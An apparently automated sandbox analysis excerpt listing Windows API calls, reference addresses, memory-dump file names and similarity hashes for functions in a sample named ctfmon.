        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 0beaa2698218d78696dd47d2982e71bd7d2d39d4c449e83d80399bd80f9cc640
        • Instruction ID: 79ff61329588fcd8c51eb6643ed27d011935784b492264ec9ea3890574dd97e0
        • Opcode Fuzzy Hash: 0beaa2698218d78696dd47d2982e71bd7d2d39d4c449e83d80399bd80f9cc640
        • Instruction Fuzzy Hash: 8E51D971900108EFCB11CF58C984BDE7BB4FF41350F2045A6E415DB2A1D774DA91CB59
        APIs
        • GetPropA.USER32(?,?), ref: 0041EF36
        • CallWindowProcA.USER32(00000000), ref: 0041EF61
          • Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$CallProcRemoveWindow
        • String ID:
        • API String ID: 2276450057-0
        • Opcode ID: 3cb7a389d14d3f0a8cba7efc88d81151684dd99c2d336f3c1b205e18befae0c2
        • Instruction ID: 8146b5ed783db7286c47fb04c36b5b3a6faea0ea761c2a130bf3399523f472a8
        • Opcode Fuzzy Hash: 3cb7a389d14d3f0a8cba7efc88d81151684dd99c2d336f3c1b205e18befae0c2
        • Instruction Fuzzy Hash: 8C31EB7EB0420477D6209A1AFC859EFB398E78A725F540537FD0593281D32DA9CB826F
        APIs
        • InterlockedIncrement.KERNEL32(0053FD88), ref: 0040D819
        • InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D828
        • InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D85B
        • InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D8F3
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Interlocked$Decrement$Increment
        • String ID:
        • API String ID: 2574743344-0
        • Opcode ID: 4e5beb613688aa6a5769420d8b65ae6e065b65cce6616efb684ed729ddedf4ef
        • Instruction ID: 58385c7f67a3b939472f6390f75cdd142ca35eef3932e53f8a3f89b6430db689
        • Opcode Fuzzy Hash: 4e5beb613688aa6a5769420d8b65ae6e065b65cce6616efb684ed729ddedf4ef
        • Instruction Fuzzy Hash: 2E31F772D04215BFEB222BE1DC45BDB7FA49B01760F10807AF514A62D1CABC49C59B69
        APIs
        • lstrlenA.KERNEL32(?), ref: 00423B6A
        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00423B8E
        • SendDlgItemMessageW.USER32(?,?,0000040B,00000000,00000001), ref: 00423BAE
        • SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 00423BCF
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ItemMessageSend$ByteCharMultiWidelstrlen
        • String ID:
        • API String ID: 3573766508-0
        • Opcode ID: a592d27849eff0fa8447953063a19a73d30d105c969762ad8121cc897157904e
        • Instruction ID: de0fd43411457c5723b9be473549cbaf37af971f57f089916a64043c4807ceea
        • Opcode Fuzzy Hash: a592d27849eff0fa8447953063a19a73d30d105c969762ad8121cc897157904e
        • Instruction Fuzzy Hash: C731D674A00228AADF209F59EC449EBBFB8EB45721F904117F95196291C63C6E42CB29
        APIs
        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D2A
        • MultiByteToWideChar.KERNEL32(?,00000009,0040F46A,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D3D
        • MultiByteToWideChar.KERNEL32(?,00000001,0040F46A,?,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D89
        • CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417DA1
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ByteCharMultiWide$CompareString
        • String ID:
        • API String ID: 376665442-0
        • Opcode ID: 65ab36382bc29e86771259d41d7cca30bc31e0b2db2b04251ba98a1bf3e1983a
        • Instruction ID: 0d49b2e9ac122ba47de66c770f7317a9987938b808b70659a99207eb4e60ffc5
        • Opcode Fuzzy Hash: 65ab36382bc29e86771259d41d7cca30bc31e0b2db2b04251ba98a1bf3e1983a
        • Instruction Fuzzy Hash: 2121183690021EEFCF218F94DC419EEBFB5FF48750F10416AFA1462160C7369962DBA4
        APIs
        • GetPropA.USER32(?,?), ref: 0041CD4D
        • SendMessageA.USER32(?,00001944,00000000,?), ref: 0041CD72
        • SendMessageA.USER32(?,00001943,00000000,?), ref: 0041CD87
        • RemovePropA.USER32(?,?), ref: 0041CD9D
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: MessagePropSend$Remove
        • String ID:
        • API String ID: 2793251306-0
        • Opcode ID: daef66e987881a51772ba138ed3b8eadad13992640693e56edf310bc52bb590e
        • Instruction ID: cdf8bf3b115a00345220dc762a3e71ecc87d4dae19ac6484943eac8265a5b6fa
        • Opcode Fuzzy Hash: daef66e987881a51772ba138ed3b8eadad13992640693e56edf310bc52bb590e
        • Instruction Fuzzy Hash: FD11AB796403107AE210AB14AC45FFF775CEB99715F404439FD1496280E27CA94A8BBF
        APIs
        • __EH_prolog.LIBCMT ref: 00429875
        • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,00000000,00000000,00000000,?,?,00435D10,00000000,?,0042AC21,00000000), ref: 004298E5
        • lstrcpynW.KERNEL32(0042AC21,00000000,?,?,00435D10,00000000,?,0042AC21,00000000,?,?,?,?,00000000), ref: 00429902
        • LocalFree.KERNEL32(00000000,?,00435D10,00000000,?,0042AC21,00000000,?,?,?,?,00000000), ref: 0042990B
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FormatFreeH_prologLocalMessagelstrcpyn
        • String ID:
        • API String ID: 1069405352-0
        • Opcode ID: 5b21970f33e5bf9ba5f39fdf96f7e2f0bfcdcf2c450e68c32a7aaf4442d72fee
        • Instruction ID: fdd3b3ea3dca44e7a97c76a848adebdcda81641acace6f1e1dd778b80c94f713
        • Opcode Fuzzy Hash: 5b21970f33e5bf9ba5f39fdf96f7e2f0bfcdcf2c450e68c32a7aaf4442d72fee
        • Instruction Fuzzy Hash: 5C112232610328FBCB20AF91EC05AEF7FA8FF08760F50441AF9089A190D3759A51CBD8
        APIs
        • GetWindow.USER32(?,00000005), ref: 0041CDE3
        • GetWindow.USER32(00000000,00000005), ref: 0041CDFF
        • GetWindow.USER32(00000000,00000002), ref: 0041CE15
        • GetWindow.USER32(00000000,00000002), ref: 0041CE20
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window
        • String ID:
        • API String ID: 2353593579-0
        • Opcode ID: 42e444434839b07a5d789e75d3d5782edf4c2f1b92dbbcb6e8ae979b3e843519
        • Instruction ID: f7176755ff76171dbc3ca36412ed8f896c65f43d2b9e194da37f980429bdcab7
        • Opcode Fuzzy Hash: 42e444434839b07a5d789e75d3d5782edf4c2f1b92dbbcb6e8ae979b3e843519
        • Instruction Fuzzy Hash: 59F0A47738070122D222756A7CC6FAB7B988BD2B51F50043AF600A6282EE59E855426D
        APIs
        • CallNextHookEx.USER32(00000000,?,?,?), ref: 0041C39B
        • UnhookWindowsHookEx.USER32(00000000), ref: 0041C3B4
        • GetWindowLongA.USER32(?,000000F0), ref: 0041C3CB
        • SendMessageA.USER32(00000001,000011F0,00000000,00000001), ref: 0041C3F5
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
        • String ID:
        • API String ID: 4187046592-0
        • Opcode ID: 16c23afb695debf94ac363d4e9ad2ba31dec4502738a3c047efa33ae589c78b7
        • Instruction ID: e56733217a63c98b9cfcbaa9d3ee52952c096190bbd855f3486cba2e69e87e11
        • Opcode Fuzzy Hash: 16c23afb695debf94ac363d4e9ad2ba31dec4502738a3c047efa33ae589c78b7
        • Instruction Fuzzy Hash: B91133B5600200AFD314DF54ECA4E6B77E5AB98314F40843DF545C33A0D774E848CB55
        APIs
        • GetWindow.USER32(?,00000005), ref: 0041CEE5
        • GetWindowLongA.USER32(?,000000F0), ref: 0041CEF2
        • SetTextColor.GDI32(?,?), ref: 0041CF0F
        • SetBkColor.GDI32(?,?), ref: 0041CF1D
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ColorWindow$LongText
        • String ID:
        • API String ID: 3945788684-0
        • Opcode ID: da9316b0ad6bc5c7f01329db74796b83aa79ab07025d310c587ae31626b05bd0
        • Instruction ID: 333cb50309b1e51d381b8678f90b3801f6ee55970ce0cf9ad49621ef8d753c56
        • Opcode Fuzzy Hash: da9316b0ad6bc5c7f01329db74796b83aa79ab07025d310c587ae31626b05bd0
        • Instruction Fuzzy Hash: FD01DD36249210ABD730D764BCC8DEF7795EB62721F14052BEA41D31D4C724A9C7C65D
        APIs
        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 004254EE
        • GetCurrentProcess.KERNEL32(?,00000000), ref: 004254F4
        • DuplicateHandle.KERNEL32(00000000), ref: 004254F7
        • GetLastError.KERNEL32(00000000), ref: 00425511
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CurrentProcess$DuplicateErrorHandleLast
        • String ID:
        • API String ID: 3907606552-0
        • Opcode ID: 3407db3102113361431f74ecb046592ffe5098ecf32879b26f542b474e9f7b4b
        • Instruction ID: ba12cf247d713ca83e744a91bb1c1a492d77c11568612e8c832d1772640133eb
        • Opcode Fuzzy Hash: 3407db3102113361431f74ecb046592ffe5098ecf32879b26f542b474e9f7b4b
        • Instruction Fuzzy Hash: 5901FC31700210BBEB10ABA5EC8AF1ABB9DDF44711F544426F519C7281EAB4DC408B64
        APIs
        • GetCurrentThreadId.KERNEL32 ref: 0041C866
        • EnterCriticalSection.KERNEL32(00540EE0), ref: 0041C873
        • UnhookWindowsHookEx.USER32(?), ref: 0041C8B6
        • LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041C8FB
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
        • String ID:
        • API String ID: 1197249173-0
        • Opcode ID: 9e0b65522af4578cecc2fb3f0b031ed18366c8c8f23206f40984a0bcafa8954b
        • Instruction ID: fe24c6a5f78cf2ac84ca5597e3b7d88d370af96ecf399c2d86962ad3691242d6
        • Opcode Fuzzy Hash: 9e0b65522af4578cecc2fb3f0b031ed18366c8c8f23206f40984a0bcafa8954b
        • Instruction Fuzzy Hash: 20119135690208EFC730EF65ECC46EA73A5FB1130AF60143AE60683591E735B89ADB94
        APIs
        • GetTopWindow.USER32(?), ref: 0042318D
        • SendMessageW.USER32(00000000,?,?,?), ref: 004231C3
        • GetTopWindow.USER32(00000000), ref: 004231D0
        • GetWindow.USER32(00000000,00000002), ref: 004231EE
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$MessageSend
        • String ID:
        • API String ID: 1496643700-0
        • Opcode ID: 2815e57003d9db41e0423e2bf2b31ad9364a6d32c4f24d28b7bef1363e754136
        • Instruction ID: d55262b01c94f31a90e2b1312f8a616a94e02ae52ed97f2f18e0d229c57d5f04
        • Opcode Fuzzy Hash: 2815e57003d9db41e0423e2bf2b31ad9364a6d32c4f24d28b7bef1363e754136
        • Instruction Fuzzy Hash: 8301E936201229BBCF126F91AC05EEF3B7AAF05351F844516FA0451124C73ECA72EBA9
        APIs
        • GetDlgItem.USER32(?,?), ref: 00423111
        • GetTopWindow.USER32(00000000), ref: 00423124
        • GetTopWindow.USER32(?), ref: 00423154
        • GetWindow.USER32(00000000,00000002), ref: 0042316F
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Item
        • String ID:
        • API String ID: 369458955-0
        • Opcode ID: 9c3072a1c57e75ce35e75a7a0718f38c470931357267061715886ecfb6dfcf54
        • Instruction ID: 345862615f9688ebf3cdbf4b66b4982080435a2b4c306f56a0d53421e26843f6
        • Opcode Fuzzy Hash: 9c3072a1c57e75ce35e75a7a0718f38c470931357267061715886ecfb6dfcf54
        • Instruction Fuzzy Hash: CB018435301139778F222F62AC00EBF7A79AF14392F854126FD0095214D73DCA3296DD
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Item$EnableFocusMenuNextParent
        • String ID:
        • API String ID: 988757621-0
        • Opcode ID: 955f1638288baaf5aef36f1df07ab6bbe9fc4d38c7aa228e1d844c59a277cbca
        • Instruction ID: 8a4b78d4f47e5053a81751d92e7ee6ced98987c858b46bcdd7bf6efd082f8e31
        • Opcode Fuzzy Hash: 955f1638288baaf5aef36f1df07ab6bbe9fc4d38c7aa228e1d844c59a277cbca
        • Instruction Fuzzy Hash: 16113C713006109BDB38AF21E859B2BB7F5AF90314FA0462EE546875A1CB78E891CB59
        APIs
        • GetCurrentThreadId.KERNEL32 ref: 0041CAA6
        • EnterCriticalSection.KERNEL32(00540EE0), ref: 0041CAB3
        • UnhookWindowsHookEx.USER32(?), ref: 0041CAEA
        • LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041CB29
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
        • String ID:
        • API String ID: 1197249173-0
        • Opcode ID: 3ae19170d0fde3a2f46e599b63ae72609a37c3c1ceb4e8870ccf4631f519f54f
        • Instruction ID: 73ecd1883983c7791e4a145524bf18d34c630e1f3d92ae3c2823ecf711c72ab0
        • Opcode Fuzzy Hash: 3ae19170d0fde3a2f46e599b63ae72609a37c3c1ceb4e8870ccf4631f519f54f
        • Instruction Fuzzy Hash: 3B01C075290608AFC730DF65FCC95EA33A4FB01349B20147AE606C3591E735B8AACF90
        APIs
        • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0042735C
        • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00427365
        • wsprintfW.USER32 ref: 00427381
        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0042739A
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ClosePrivateProfileStringValueWritewsprintf
        • String ID:
        • API String ID: 1902064621-0
        • Opcode ID: fc99b9af46ba9a1375285de4589dcd498f93602ba153ff3f4116a39f089e6061
        • Instruction ID: 6d4ab68f11891ff308c174a238285f84ccdd3e51e257b8ace891e9d2ef57e05c
        • Opcode Fuzzy Hash: fc99b9af46ba9a1375285de4589dcd498f93602ba153ff3f4116a39f089e6061
        • Instruction Fuzzy Hash: EA016272600224BBCF219FA4EC09FDE37A9AF08714F844026FE15E6190E7B4D511DB9C
        APIs
        • GetObjectW.GDI32(00000000,0000000C,?), ref: 004237F1
        • SetBkColor.GDI32(00000000,00000000), ref: 004237FD
        • GetSysColor.USER32(00000008), ref: 0042380D
        • SetTextColor.GDI32(00000000,?), ref: 00423817
          • Part of subcall function 00426950: GetWindowLongW.USER32(00000000,000000F0), ref: 00426961
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
